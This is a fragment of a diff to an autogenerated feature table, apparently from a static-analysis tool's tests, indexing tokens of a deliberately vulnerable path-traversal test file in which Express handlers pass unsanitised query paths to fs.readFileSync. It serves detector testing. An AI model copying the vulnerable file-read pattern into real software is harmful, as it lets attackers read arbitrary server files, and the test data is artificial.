enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:17:30:17:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:30:17:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:30:17:33 | join | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:30:17:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:30:17:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:17:35:17:50 | '/home/user/www' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:17:35:17:50 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:17:35:17:50 | '/home/user/www' | calleeImports | path | @@ -7519,6 +69791,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:17:53:17:56 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:17:53:17:56 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:17:53:17:56 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:20:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:1:28:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:5:20:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:5:20:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:5:20:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | calleeImports | express | @@ -7526,6 +69813,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:20:9:20:20 | '/normalize' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:20:22 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -7533,11 +69835,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:23:28:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:24:20:26 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:20:29:20:31 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:20:29:20:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:20:29:20:31 | res | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:20:29:20:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:20:29:20:31 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:7:21:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | | autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:25:21:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:25:21:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:25:21:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:25:21:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:25:21:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:35:21:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | calleeImports | path | @@ -7547,6 +69919,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:21:35:21:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:21:39:21:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:39:21:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:39:21:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:39:21:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:39:21:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:21:45:21:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:21:45:21:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:21:45:21:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:21:45:21:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:21:45:21:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:23:3:23:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:23:6:23:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:23:6:23:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:23:6:23:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:23:6:23:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:23:6:23:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | calleeImports | fs | @@ -7556,6 +69963,37 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:23:19:23:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | exceptional return of fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | exceptional return of fs.read ... + path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | exceptional return of fs.read ... + path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | exceptional return of fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | exceptional return of fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | fs.read ... + path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | fs.read ... + path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:3:24:30 | fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:6:24:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:6:24:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:6:24:17 | readFileSync | 